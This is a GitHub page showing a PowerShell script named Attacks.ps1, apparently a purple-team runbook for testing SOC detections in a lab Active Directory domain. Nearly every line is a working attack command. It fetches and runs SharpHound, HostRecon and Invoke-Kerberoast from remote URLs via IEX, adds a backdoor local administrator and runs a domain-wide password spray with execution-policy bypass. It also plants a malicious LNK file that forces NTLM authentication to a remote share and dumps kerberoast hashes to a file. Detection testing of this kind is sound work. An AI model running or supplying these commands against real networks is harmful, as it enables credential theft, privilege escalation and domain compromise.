-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathAttacks.ps1
More file actions
95 lines (59 loc) · 3.14 KB
/
Attacks.ps1
File metadata and controls
95 lines (59 loc) · 3.14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
# Attacks-Some
# PowerShell invoke-expression of BloodHound
# First tho, enable TLS1.2 for PowerShell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Invoke-BloodHound
# This time, copy the BloodHound containers down
# First tho, disable PowerShell's progress bar, which causes ridiculously slow downloads
# Then, enable TLS1.2 for PowerShell
$ProgressPreference = 'SilentlyContinue'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest –URI https://github.com/BloodHoundAD/BloodHound/archive/master.zip -OutFile "master.zip"
Expand-Archive master.zip
Import-Module .\master\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound
# Let's run a few commands to check on detections for:
# 1. user additions
# 2. maybe privileged group modifications -- should be EID 4799?
net1 user bhissoctest Soctest12! /add
net1 localgroup administrators bhissoctest /add
# Check on current domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Run local host recon script
# As always, make sure PowerShell supports TLS traffic
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/HostRecon/master/HostRecon.ps1')
Invoke-HostRecon |Out-File recon.txt
# Password spray against all users!
# Gather archives first
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -URI "https://github.com/dafthack/DomainPasswordSpray/archive/master.zip" -OutFile "~\Downloads\master.zip"
# Expand DPS .zip file
cd ~\Downloads\
Expand-Archive "master.zip"
# cd to the correct directory and execute the attack
cd ~\Downloads\master\DomainPasswordSpray-master
Set-ExecutionPolicy Bypass -Force
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2020! -Force
# Create a malicious LNK file
# Triggers here might be sysmon event ID 11 (file create boolean on .lnk)
# Or, suspicious wscript execution
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\users\Public\Malicious.lnk")
$lnk.TargetPath = "\\10.10.98.20\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing the desktop should trigger silent auth."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
# Add an SPN to an account
# Domain may need to change here
# This is kerberoasting
setspn -a ws01/administrator.labs.local:1433 labs.local\administrator
setspn -T labs.local -Q */*
set-ExecutionPolicy bypass -Force
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath ‘c:\users\public\HashCapture.txt’ -Width 8000